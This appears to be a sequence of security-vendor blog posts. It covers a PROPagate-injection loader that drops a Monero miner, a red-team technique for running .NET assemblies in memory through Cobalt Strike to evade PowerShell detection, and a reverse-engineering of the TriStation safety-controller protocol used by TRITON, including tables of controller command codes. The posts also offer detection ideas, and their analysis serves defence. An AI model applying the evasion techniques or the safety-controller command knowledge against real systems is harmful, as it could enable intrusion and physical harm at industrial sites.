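        if name_ptr and name_ptr > 0xFFFF:
            name = ctypes.string_at(name_ptr).decode(errors="replace")
            props.append((name, handle or 0))
        return True

    user32.EnumPropsA(hwnd, PROPENUMPROC(on_prop))
    return props

if __name__ == "__main__":
    shell = user32.GetShellWindow()
    for name, handle in list_window_props(shell):
        note = "  <-- subclass data abused by PROPagate" if "UxSubclassInfo" in name else ""
        print(name, hex(handle), note)
```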

SetPropA takes three arguments, the third of which is the data handle. The callback procedure address is stored at offset 0x14 from the beginning of that data. The malware overwrites the callback address with the address of the injected shellcode (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the entry point of the injected third stage payload using CreateThread. It then restores the callback that was modified during the PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates an MD5 hash from the computer name and volume information using the Microsoft CryptoAPI and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Bring Your Own Land (BYOL) – A Novel Red Teaming Technique

Introduction

One of the most significant recent developments in sophisticated offensive operations is the use of “Living off the Land” (LotL) techniques by attackers. These techniques leverage legitimate tools present on the system, such as the PowerShell scripting language, in order to execute attacks. The popularity of PowerShell as an offensive tool culminated in the development of entire Red Team frameworks based around it, such as Empire and PowerSploit. In addition, the execution of PowerShell can be obfuscated through the use of tools such as “Invoke-Obfuscation”. In response, defenders have developed detections for the malicious use of legitimate applications. These detections include suspicious parent/child process relationships, suspicious process command line arguments, and even deobfuscation of malicious PowerShell scripts through the use of Script Block Logging.

In this blog post, I will discuss an alternative to current LotL techniques. With the most current build of Cobalt Strike (version 3.11), it is now possible to execute .NET assemblies entirely within memory by using the “execute-assembly” command. By developing custom C#-based assemblies, attackers no longer need to rely on the tools present on the target system; they can instead write and deliver their own tools, a technique I call Bring Your Own Land (BYOL). I will demonstrate this technique through the use of a custom .NET assembly that replicates some of the functionality of the PowerSploit project. I will also discuss how detections can be developed around BYOL techniques.

Background

At DerbyCon last year, I had the pleasure of meeting Raphael Mudge, the developer behind the Cobalt Strike Remote Access Tool (RAT). During our discussion, I mentioned how useful it would be to be able to load .NET assemblies into Cobalt Strike beacons, similar to how PowerShell scripts can be imported using the “powershell-import” command. During a previous Red Team engagement I had been involved in, the use of PowerShell was precluded by the Endpoint Detection and Response (EDR) agent present on host machines within the target environment. This was a significant issue, as much of my red teaming methodology at the time was based on the use of various PowerShell scripts. For example, the “Get-NetUser” cmdlet of the PowerView script allows for the enumeration of domain users within an Active Directory environment. While the use of PowerShell was not an option, I found that no application-based whitelisting was occurring on hosts within the target’s environment. Therefore, I started converting the PowerShell functionality into C# code, compiling assemblies locally as Portable Executable (PE) files, and then uploading the PE files onto target machines and executing them. This tactic was successful, and I was able to use these custom assemblies to elevate privileges up to Domain Admin within the target environment.

Raphael agreed that the ability to load these assemblies in-memory using a Cobalt Strike beacon would be useful, and about 8 months later this functionality was incorporated into Cobalt Strike version 3.11 via the “execute-assembly” command.

“execute-assembly” Demonstration

For this demonstration, a custom C# .NET assembly named “get-users” was used. This assembly replicated some of the functionality of the PowerView “Get-NetUser” cmdlet; it queried the Domain Controller of the specified domain for a list of all current domain accounts. Information obtained included the “SAMAccountName”, “UserGivenName”, and “UserSurname” properties for each account. The domain is specified by passing its FQDN as an argument, and the results are then sent to stdout. The assembly being executed within a Cobalt Strike beacon is shown in Figure 1.


Figure 1: Using the “execute-assembly” command within a Cobalt Strike beacon.

Simple enough. Now let’s take a look at how this technique works under the hood.

How “execute-assembly” Works

In order to discover more about how the “execute-assembly” command works, the execution performed in Figure 1 was repeated with the host running ProcMon. The results of the process tree from ProcMon after execution are shown in Figure 2.


Figure 2: Process tree from ProcMon after executing “execute-assembly” command.

In Figure 2, the “powershell.exe (2792)” process contains the beacon, while the “rundll32.exe (2708)” process is used to load and execute the “get-users” assembly. Note that “powershell.exe” is shown as the parent process of “rundll32.exe” in this example because the Cobalt Strike beacon was launched by using a PowerShell one-liner; however, nearly any process can be used to host a beacon by leveraging various process migration techniques. From this information, we can determine that the “execute-assembly” command is similar to other Cobalt Strike post-exploitation jobs. In Cobalt Strike, some functions are offloaded to new processes, in order to ensure the stability of the beacon. The rundll32.exe Windows binary is used by default, although this setting can be changed. In order to migrate the necessary code into the new process, the CreateRemoteThread function is used. We can confirm that this function is utilized by monitoring the host with Sysmon while the “execute-assembly” command is performed. The event generated by the use of the CreateRemoteThread function is shown in Figure 3.


Figure 3: CreateRemoteThread Sysmon event, created after performing the “execute-assembly” command.

More information about this event is shown in Figure 4.


Figure 4: Detailed information about the Sysmon CreateRemoteThread event shown in Figure 3.

In order to execute the provided assembly, the Common Language Runtime (CLR) must be loaded into the newly created process. From the ProcMon logs, we can determine the exact DLLs that are loaded during this step. A portion of these DLLs are shown in Figure 5.


Figure 5: Example of DLLs loaded into rundll32 for hosting the CLR.

In addition, DLLs loaded into the rundll32 process include those necessary for the get-users assembly, such as those for LDAP communication and Kerberos authentication. A portion of these DLLs are shown in Figure 6.


Figure 6: Example of DLLs loaded into rundll32 for Kerberos authentication.

The ProcMon logs confirm that the provided assembly is never written to disk, making the “execute-assembly” command an entirely in-memory attack.

Detecting and Preventing “execute-assembly”

There are several ways to protect against the “execute-assembly” command. As previously detailed, because the technique is a post-exploitation job in Cobalt Strike, it uses the CreateRemoteThread function, which is commonly detected by EDR solutions. However, it is possible that other implementations of BYOL techniques would not require the use of the CreateRemoteThread function.

The “execute-assembly” technique makes use of the native LoadImage function in order to load the provided assembly. The CLRGuard project hooks into the use of this function, and prevents its execution. An example of CLRGuard preventing the execution of the “execute-assembly” command is shown in Figure 7.


Figure 7: CLRGuard blocking the execution of the “execute-assembly” technique.

The resulting error is shown on the Cobalt Strike teamserver in Figure 8.


Figure 8: Error shown in Cobalt Strike when “execute-assembly” is blocked by CLRGuard.

While CLRGuard is effective at preventing the “execute-assembly” command, as well as other BYOL techniques, it is likely that blocking all use of the LoadImage function on a system would negatively impact other benign applications, and is not recommended for production environments.

As with almost all security issues, baselining and correlation are the most effective means of detecting this technique. Suspicious events to correlate could include the use of the LoadImage function by processes that do not typically utilize it, and unusual DLLs being loaded into processes.
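
As a rough sketch of what that baselining could look like, the following Python example (written for this post, not part of any FireEye product) builds a per-process inventory of loaded DLLs from a CSV export of Sysmon Event ID 7 (Image Loaded) records and flags processes that load CLR DLLs they never loaded during the baseline period. The file names are placeholders; the "Image" and "ImageLoaded" columns mirror Sysmon’s field names.

    import csv
    from collections import defaultdict

    CLR_DLLS = {"clr.dll", "mscoree.dll", "mscorwks.dll", "clrjit.dll"}

    def load_events(path):
        """Yield (process image, loaded DLL name) pairs from a CSV export of
        Sysmon Event ID 7 (Image Loaded) records."""
        with open(path, newline="") as handle:
            for row in csv.DictReader(handle):
                yield row["Image"].lower(), row["ImageLoaded"].split("\\")[-1].lower()

    def build_baseline(path):
        """Count how often each process image loaded each DLL during a known-good period."""
        baseline = defaultdict(lambda: defaultdict(int))
        for image, dll in load_events(path):
            baseline[image][dll] += 1
        return baseline

    def find_unusual_clr_loads(baseline, path):
        """Flag processes that load CLR DLLs they never loaded in the baseline."""
        for image, dll in load_events(path):
            if dll in CLR_DLLS and baseline[image][dll] == 0:
                print(f"Unusual CLR load: {image} loaded {dll}")

    baseline = build_baseline("sysmon_imageload_baseline.csv")      # placeholder export
    find_unusual_clr_loads(baseline, "sysmon_imageload_recent.csv")  # placeholder export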

Advantages of BYOL

Due to the prevalent use of PowerShell scripts by sophisticated attackers, detection of malicious PowerShell activity has become a primary focus of current detection methodology. In particular, version 5 of PowerShell allows for the use of Script Block Logging, which is capable of recording exactly what PowerShell scripts are executed by the system, regardless of obfuscation techniques. In addition, Constrained Language mode can be used to restrict PowerShell functionality. While bypasses exist for these protections, such as PowerShell downgrade attacks, each bypass an attacker attempts is another event that a defender can trigger off of. BYOL allows for the execution of attacks normally performed by PowerShell scripts, while avoiding all potential PowerShell-based alerts entirely.

PowerShell is not the only native binary whose malicious use is being tracked by defenders. Other common binaries whose use defenders alert on include WMIC, schtasks/at, and reg. The functionality of all these tools can be replicated within custom .NET assemblies, due to the flexibility of C# code. By replicating the functionality of these tools without using them, an attacker renders alerts based on their malicious use ineffective.

Finally, thanks to the use of reflective loading, the BYOL technique can be performed entirely in-memory, without the need to write to disk.

Conclusion

BYOL presents a powerful new technique for red teamers to remain undetected during their engagements, and can easily be used with Cobalt Strike’s “execute-assembly” command. In addition, the use of C# assemblies can offer attackers more flexibility than similar PowerShell scripts can afford. Detections for CLR-based techniques, such as hooking of functions used to reflectively load assemblies, should be incorporated into defensive methodology, as these attacks are likely to become more prevalent as detections for LotL techniques mature.

Acknowledgement

Special thanks to Casey Erikson, who I have worked closely with on developing C# assemblies that leverage this technique, for his contributions to this blog.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. This investment, and the safety-critical purpose of the Triconex SIS controllers, leads Mandiant to assess that the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies, and to answer these types of questions, so we started with a deeper look at TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but natively implemented through the TriStation 1131 software suite. TriStation operates over UDP port 1502 and allows for communications between designated masters (PCs with the software that act as “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In TsLow.pyc’s print_last_error function we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), indicating that the first two bytes should be interpreted as an integer message type and the next two bytes as an integer message size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.
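
To make that header handling concrete, here is a minimal Python sketch of the same parsing logic, written by us rather than taken from TRITON. It unpacks the two little-endian 16-bit fields at offset 0 and labels the message type using an excerpt of the dictionary values discussed in this post (the full list is in Appendix A); the sample packet is fabricated for illustration.

    import struct

    # Message types at offset 0, per the TS_cnames.pyc dictionary (excerpt; see Appendix A).
    MESSAGE_TYPES = {
        1: "Connection Request",
        2: "Connection Response",
        5: "Execution Command",
        6: "Ping Command",
    }

    def parse_header(data_received):
        """Unpack the first four bytes of a TriStation message the same way tcm_result
        does: two little-endian 16-bit integers (message type, then message size)."""
        msg_type, size = struct.unpack("<HH", data_received[0:4])
        name = MESSAGE_TYPES.get(msg_type, "Unknown (%d)" % msg_type)
        return msg_type, name, size

    # Fabricated example: a header declaring an Execution Command with a 32-byte body.
    print(parse_header(struct.pack("<HH", 5, 32) + b"\x00" * 32))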

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece of the script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.
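
Putting those observations together, a short Python sketch of how the function code at offset 6 could be labeled looks like the following. The dictionary excerpt comes from the TS_names values reproduced in Appendix B, the "reply if 100 or greater" check mirrors the TRITON behavior described above, and the packet bytes are entirely hypothetical.

    # Excerpt of the TS_names dictionary (see Appendix B for the full verbatim table).
    TS_NAMES = {
        20: "Run program",
        21: "Halt program",
        100: "Command rejected",
        109: "Program is running",
    }

    def describe_command(ts_packet):
        """Label the single-byte function code at offset 6 of a TriStation packet.
        Values of 100 and above correspond to command replies in the dictionary."""
        cmd = ts_packet[6]
        kind = "command reply" if cmd >= 100 else "command request"
        return cmd, kind, TS_NAMES.get(cmd, "unknown to this excerpt")

    # Hypothetical packet: type 5 (Execution Command), speculative dir/cid bytes,
    # then 0x14 (20, 'Run program') at offset 6.
    example = bytes([0x05, 0x00, 0x0C, 0x00, 0x01, 0x01, 0x14, 0x00, 0x00, 0x00])
    print(describe_command(example))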


Figure 6: Excerpt TS_cnames.pyc TS_names array, which contain TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed that similarities between the two protocols would exist, and leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this was the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from a government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer clearly uses much of the right vernacular and acronyms, showing familiarity with PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name: tr1com40.dll
MD5: 069247DF527A96A0E048732CA57E7D3D
Size: 110592
Compile Date: 2006-08-23
File Description: Tricon Communications Interface
Product Name: TricCom Dynamic Link Library
File Version: 4.2.441
Original File Name: TricCom.DLL
Copyright: Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc appears in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". We even see misspelled command strings verbatim, such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname | Compile Date | Reference CPP Strings Code
Lagcom40.dll | 2004/11/19 | $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Tr1com40.dll | 2006/08/23 | $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4
Tridcom.dll | 2008/07/23 | $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Triccom.dll | 2008/07/23 | $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4
Tridcom.dll | 2010/09/29 | $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Tr1com.dll | 2011/04/27 | $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4
Lagcom.dll | 2011/04/27 | $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Triccom.dll | 2011/04/27 | $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc) | Tr1com40.dll (2006 CPP)
Go to DOWNLOAD mode | <200>
Not set | <209>
Unk75 | Bad message from module
Unk76 | Bad message type
Unk77 | Bad TMI version number
Unk78 | Module did not respond
Unk79 | Open Connection: Invalid SAP %d
Unk81 | Unsupported message for this TMI version
Unk83 |
Wrong command |

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation protocol, the threat actors still had an incomplete understanding of it. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name | MD5 | Description
Tr1com40.dll | 069247df527a96a0e048732ca57e7d3d | Tricon Communications DLL
Data1.cab | e6a3c93a6d433cbaf6f573b6c09d76c4 | Parent of Tr1com40.dll
Trilog v4.1.360R | 13a3b83ba2c4236ca59aba679941c8a5 | RAR Archive of TriLog
TridCom.dll | 5c2ed617fdec4779cb33c89082a43100 | Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies. If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most ICS attacks involve standard IT intrusions, we should come together to invent and improve guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about TriStation here on the blog, our work on the protocol will continue.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.

Recommended Reading

Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0 | Message Type
1 | Connection Request
2 | Connection Response
3 | Disconnect Request
4 | Disconnect Response
5 | Execution Command
6 | Ping Command
7 | Connection Limit Reached
8 | Not Connected
9 | MPS Are Dead
10 | Access Denied
11 | Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6 | TS_cnames String
0 | 0: 'Start download all',
1 | 1: 'Start download change',
2 | 2: 'Update configuration',
3 | 3: 'Upload configuration',
4 | 4: 'Set I/O addresses',
5 | 5: 'Allocate network',
6 | 6: 'Load vector table',
7 | 7: 'Set calendar',
8 | 8: 'Get calendar',
9 | 9: 'Set scan time',
A | 10: 'End download all',
B | 11: 'End download change',
C | 12: 'Cancel download change',
D | 13: 'Attach TRICON',
E | 14: 'Set I/O address limits',
F | 15: 'Configure module',
10 | 16: 'Set multiple point values',
11 | 17: 'Enable all points',
12 | 18: 'Upload vector table',
13 | 19: 'Get CP status ',
14 | 20: 'Run program',
15 | 21: 'Halt program',
16 | 22: 'Pause program',
17 | 23: 'Do single scan',
18 | 24: 'Get chassis status',
19 | 25: 'Get minimum scan time',
1A | 26: 'Set node number',
1B | 27: 'Set I/O point values',
1C | 28: 'Get I/O point values',
1D | 29: 'Get MP status',
1E | 30: 'Set retentive values',
1F | 31: 'Adjust clock calendar',
20 | 32: 'Clear module alarms',
21 | 33: 'Get event log',
22 | 34: 'Set SOE block',
23 | 35: 'Record event log',
24 | 36: 'Get SOE data',
25 | 37: 'Enable OVD',
26 | 38: 'Disable OVD',
27 | 39: 'Enable all OVDs',
28 | 40: 'Disable all OVDs',
29 | 41: 'Process MODBUS',
2A | 42: 'Upload network',
2B | 43: 'Set lable',
2C | 44: 'Configure system variables',
2D | 45: 'Deconfigure module',
2E | 46: 'Get system variables',
2F | 47: 'Get module types',
30 | 48: 'Begin conversion table download',
31 | 49: 'Continue conversion table download',
32 | 50: 'End conversion table download',
33 | 51: 'Get conversion table',
34 | 52: 'Set ICM status',
35 | 53: 'Broadcast SOE data available',
36 | 54: 'Get module versions',
37 | 55: 'Allocate program',
38 | 56: 'Allocate function',
39 | 57: 'Clear retentives',
3A | 58: 'Set initial values',
3B | 59: 'Start TS2 program download',
3C | 60: 'Set TS2 data area',
3D | 61: 'Get TS2 data',
3E | 62: 'Set TS2 data',
3F | 63: 'Set program information',
40 | 64: 'Get program information',
41 | 65: 'Upload program',
42 | 66: 'Upload function',
43 | 67: 'Get point groups',
44 | 68: 'Allocate symbol table',
45 | 69: 'Get I/O address',
46 | 70: 'Resend I/O address',
47 | 71: 'Get program timing',
48 | 72: 'Allocate multiple functions',
49 | 73: 'Get node number',
4A | 74: 'Get symbol table',
4B | 75: 'Unk75',
4C | 76: 'Unk76',
4D | 77: 'Unk77',
4E | 78: 'Unk78',
4F | 79: 'Unk79',
50 | 80: 'Go to DOWNLOAD mode',
51 | 81: 'Unk81',
52 | (no dictionary entry)
53 | 83: 'Unk83',
54-63 | (no dictionary entries)
64 | 100: 'Command rejected',
65 | 101: 'Download all permitted',
66 | 102: 'Download change permitted',
67 | 103: 'Modification accepted',
68 | 104: 'Download cancelled',
69 | 105: 'Program accepted',
6A | 106: 'TRICON attached',
6B | 107: 'I/O addresses set',
6C | 108: 'Get CP status response',
6D | 109: 'Program is running',
6E | 110: 'Program is halted',
6F | 111: 'Program is paused',
70 | 112: 'End of single scan',
71 | 113: 'Get chassis configuration response',
72 | 114: 'Scan period modified',
73 | 115: '<115>',
74 | 116: '<116>',
75 | 117: 'Module configured',
76 | 118: '<118>',
77 | 119: 'Get chassis status response',
78 | 120: 'Vectors response',
79 | 121: 'Get I/O point values response',
7A | 122: 'Calendar changed',
7B | 123: 'Configuration updated',
7C | 124: 'Get minimum scan time response',
7D | 125: '<125>',
7E | 126: 'Node number set',
7F | 127: 'Get MP status response',
80 | 128: 'Retentive values set',
81 | 129: 'SOE block set',
82 | 130: 'Module alarms cleared',
83 | 131: 'Get event log response',
84 | 132: 'Symbol table ccepted',
85 | 133: 'OVD enable accepted',
86 | 134: 'OVD disable accepted',
87 | 135: 'Record event log response',
88 | 136: 'Upload network response',
89 | 137: 'Get SOE data response',
8A | 138: 'Alocate network accepted',
8B | 139: 'Load vector table accepted',
